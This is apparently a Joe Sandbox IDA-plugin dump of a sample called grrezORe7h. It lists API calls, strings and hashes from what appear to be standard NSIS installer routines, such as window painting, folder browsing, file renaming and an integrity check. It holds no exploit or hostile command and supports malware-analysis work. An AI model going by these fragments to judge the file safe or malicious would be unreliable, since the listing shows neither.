                                                                                                                      • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                      • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                                      • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                      • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                        • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                      • lstrcatW.KERNEL32(00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,00441800,00000000,0043F000), ref: 0040391F
                                                                                                                      • lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
                                                                                                                      • lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                                      • GetFileAttributesW.KERNEL32(00432EA0), ref: 004039BD
                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403A06
                                                                                                                        • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                      • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                                      • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                                      • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                      • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                      • API String ID: 1975747703-1115850852
                                                                                                                      • Opcode ID: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                                      • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                                      • Opcode Fuzzy Hash: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                                      • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D
                                                                                                                      APIs
                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                      • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                      • String ID: F
                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                      • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                      • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                                      • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                      • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                                      APIs
                                                                                                                      • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                                      • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                        • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                        • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                      • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                                      • wsprintfA.USER32 ref: 00405DFB
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                                      • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                        • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                        • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                      • API String ID: 222337774-899692902
                                                                                                                      • Opcode ID: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                                      • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                                      • Opcode Fuzzy Hash: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                                      • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                                      • lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 0040471B
                                                                                                                      • lstrcatW.KERNEL32(?,00432EA0), ref: 00404727
                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                        • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                                        • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                                        • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                        • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                                        • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                                        • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                        • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                        • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                      • String ID: A
                                                                                                                      • API String ID: 2624150263-3554254475
                                                                                                                      • Opcode ID: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                                      • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                                      • Opcode Fuzzy Hash: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                                      • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                                      APIs
                                                                                                                      • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                        • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                        • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                                      Strings
                                                                                                                      • Null, xrefs: 00402EE5
                                                                                                                      • (*B, xrefs: 00402E7C
                                                                                                                      • soft, xrefs: 00402EDC
                                                                                                                      • Inst, xrefs: 00402ED3
                                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                                                                                      • Error launching installer, xrefs: 00402E3E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                      • String ID: (*B$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                      • API String ID: 4283519449-2478819026
                                                                                                                      • Opcode ID: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                                      • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                                      • Opcode Fuzzy Hash: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                                      • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD
                                                                                                                      APIs
                                                                                                                      • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040613A
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061B8
                                                                                                                      • GetWindowsDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061CB
                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                                      • SHGetPathFromIDListW.SHELL32(?,00432EA0), ref: 00406215
                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                                      • lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                                      • lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040629E
                                                                                                                      Strings
                                                                                                                      • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
                                                                                                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                      • API String ID: 900638850-730719616
                                                                                                                      • Opcode ID: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                                      • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                                      • Opcode Fuzzy Hash: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                                      • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountTick$wsprintf
                                                                                                                      • String ID: jA$ jA$... %d%%
                                                                                                                      • API String ID: 551687249-2167919867
                                                                                                                      • Opcode ID: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                                      • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                                      • Opcode Fuzzy Hash: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                                      • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA
                                                                                                                      APIs
                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                                      • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                                      • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                                      • GetSysColor.USER32(?), ref: 004041E4
                                                                                                                      • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                                      • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2320649405-0
                                                                                                                      • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                      • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                                      • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                      • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                                      APIs
                                                                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                        • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                      • String ID: 9
                                                                                                                      • API String ID: 163830602-2366072709
                                                                                                                      • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                      • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                                      • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                      • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69
                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                      • lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                      • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                                      • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2531174081-0
                                                                                                                      • Opcode ID: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                                      • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                                      • Opcode Fuzzy Hash: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                                      • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                                      • GetMessagePos.USER32 ref: 00404AA1
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                      • String ID: f
                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                      • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                      • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                                      • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                      • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                                      APIs
                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                      • MulDiv.KERNEL32(?,00000064,?), ref: 00402D4D
                                                                                                                      • wsprintfW.USER32 ref: 00402D5D
                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                      Strings
                                                                                                                      • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
